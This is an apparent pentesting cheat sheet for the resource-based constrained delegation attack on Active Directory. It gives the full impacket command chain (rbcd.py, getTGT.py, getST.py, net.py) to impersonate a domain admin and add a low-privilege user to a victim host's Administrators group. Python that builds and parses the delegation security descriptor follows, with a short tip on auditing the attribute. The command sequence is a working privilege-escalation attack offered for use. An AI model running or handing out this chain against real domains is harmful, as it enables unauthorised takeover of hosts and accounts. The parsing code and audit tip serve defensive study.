
rbcd.py

Example of performing the RBCD (resource-based constrained delegation) attack when you hold a TGT for a user with write access to the victim computer object, plus a machine account you control (GHOSTY$ here, which you added to AD yourself and therefore know the password for).

Delegate TO the victim box FROM the machine you added to AD. With KRB5CCNAME pointing at the ccache holding that user's TGT, write GHOSTY$ into the victim's msDS-AllowedToActOnBehalfOfOtherIdentity attribute (-action 'read' afterwards shows what is set):

rbcd.py -delegate-from 'GHOSTY$' -delegate-to 'VICTIMSYSTEM$' -action 'write' 'domain.com/user-you-have-a-TGT-for' -k -no-pass

Then use getTGT.py to request a TGT for the GHOSTY$ machine account (it prompts for the password you set when you created the account, and saves the ticket as GHOSTY$.ccache) and point KRB5CCNAME at it. getST.py with -k -no-pass takes whatever TGT sits in KRB5CCNAME without checking whose it is, so this must be GHOSTY$'s ticket, not the user TGT from the previous step.

getTGT.py 'domain.com/GHOSTY$'
export KRB5CCNAME='GHOSTY$.ccache'

Then use getST.py to request a TGS for the victim's CIFS service on behalf of a high-privilege user (S4U2self followed by S4U2proxy) and point KRB5CCNAME at the resulting ticket. Alternatively, omit -k -no-pass and supply GHOSTY$'s password, and getST.py fetches the TGT itself. The impersonated account must not be in Protected Users or flagged "account is sensitive and cannot be delegated", or the S4U2proxy step is refused.

getST.py -impersonate 'domainadmin' -spn 'cifs/VICTIM.domain.com' 'domain.com/GHOSTY$' -k -no-pass
export KRB5CCNAME=domainadmin.ccache

Use whichever file name getST.py reports saving the ticket as; newer versions include the SPN and realm in the name.

Finally, use the impersonated ticket with something like net.py to add your low-privileged user (lowpriv) to the victim's local Administrators group. Address the host by the name used in the SPN (VICTIM.domain.com), not by IP address, or the Kerberos authentication fails.

net.py -k -no-pass VICTIM.domain.com localgroup -name Administrators -join lowpriv
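To see what the rbcd.py -action 'write' step above actually puts on the victim computer object, here is an added example (my own code, not from this page and not taken from impacket) that builds the self-relative security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity and parses one back into the list of SIDs allowed to delegate. The function names build_rbcd_sd and parse_rbcd_sd are mine, the SIDs are constructed sample values, and the layout (owner and group BUILTIN\Administrators, one ACCESS_ALLOWED ACE with a full-control mask per delegating SID) is my understanding of what rbcd.py writes, so treat it as an assumption rather than a spec of the tool.

```python
"""
Build and parse the security descriptor held in a computer object's
msDS-AllowedToActOnBehalfOfOtherIdentity attribute, i.e. the blob that
`rbcd.py -action write` sets and `-action read` decodes.
Pure Python (struct only); all SIDs used here are constructed examples.
"""
import struct

SE_SELF_RELATIVE = 0x8000
SE_DACL_PRESENT = 0x0004
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0
# Full-control mask (0xF01FF) granted to the delegate-from account;
# assumed to match what rbcd.py writes.
RBCD_ACE_MASK = 0x000F01FF
BUILTIN_ADMINS = "S-1-5-32-544"   # used as owner and group of the SD


def sid_to_bytes(sid: str) -> bytes:
    """Encode an S-1-... string as a binary SID."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"bad SID {sid!r}")
    authority = int(parts[2])
    subs = [int(x) for x in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    out = struct.pack("<BB", 1, len(subs))          # revision, count
    out += authority.to_bytes(6, "big")             # identifier authority
    out += b"".join(struct.pack("<I", s) for s in subs)
    return out


def sid_from_bytes(buf: bytes, off: int):
    """Return (sid_string, encoded_size) for the binary SID at buf[off:]."""
    rev, count = struct.unpack_from("<BB", buf, off)
    if rev != 1:
        raise ValueError("unsupported SID revision")
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-1-%d%s" % (authority, "".join("-%d" % s for s in subs)), 8 + 4 * count


def build_rbcd_sd(delegate_from_sids):
    """Self-relative SD with one ACCESS_ALLOWED ACE per delegating account."""
    aces = b""
    for sid in delegate_from_sids:
        sid_b = sid_to_bytes(sid)
        ace_size = 8 + len(sid_b)                   # ACE header (4) + mask (4) + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, RBCD_ACE_MASK) + sid_b
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(delegate_from_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    group = sid_to_bytes(BUILTIN_ADMINS)
    off_owner = 20                                   # fixed SD header size
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, off_group, 0, off_dacl)   # OffsetSacl = 0: no SACL
    return header + owner + group + dacl


def parse_rbcd_sd(blob: bytes):
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the SD's DACL.

    An empty list means nobody may act on behalf of other identities to
    this host, which is the expected state for almost every computer.
    """
    rev, _sbz1, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _acl_rev, _sbz, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", blob, off_dacl)
    pos = off_dacl + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = sid_from_bytes(blob, pos + 8)  # skip ACE header + mask
            sids.append(sid)
        pos += ace_size
    return sids


if __name__ == "__main__":
    ghosty = "S-1-5-21-1004336348-1177238915-682003330-1105"   # constructed SID for GHOSTY$
    blob = build_rbcd_sd([ghosty])
    print(len(blob), "bytes:", blob.hex())
    print("allowed to delegate:", parse_rbcd_sd(blob))
```

The same parser serves the defensive side: pull msDS-AllowedToActOnBehalfOfOtherIdentity for every computer object over LDAP, decode it with parse_rbcd_sd, and review any host whose list is non-empty, especially when it names a recently created machine account.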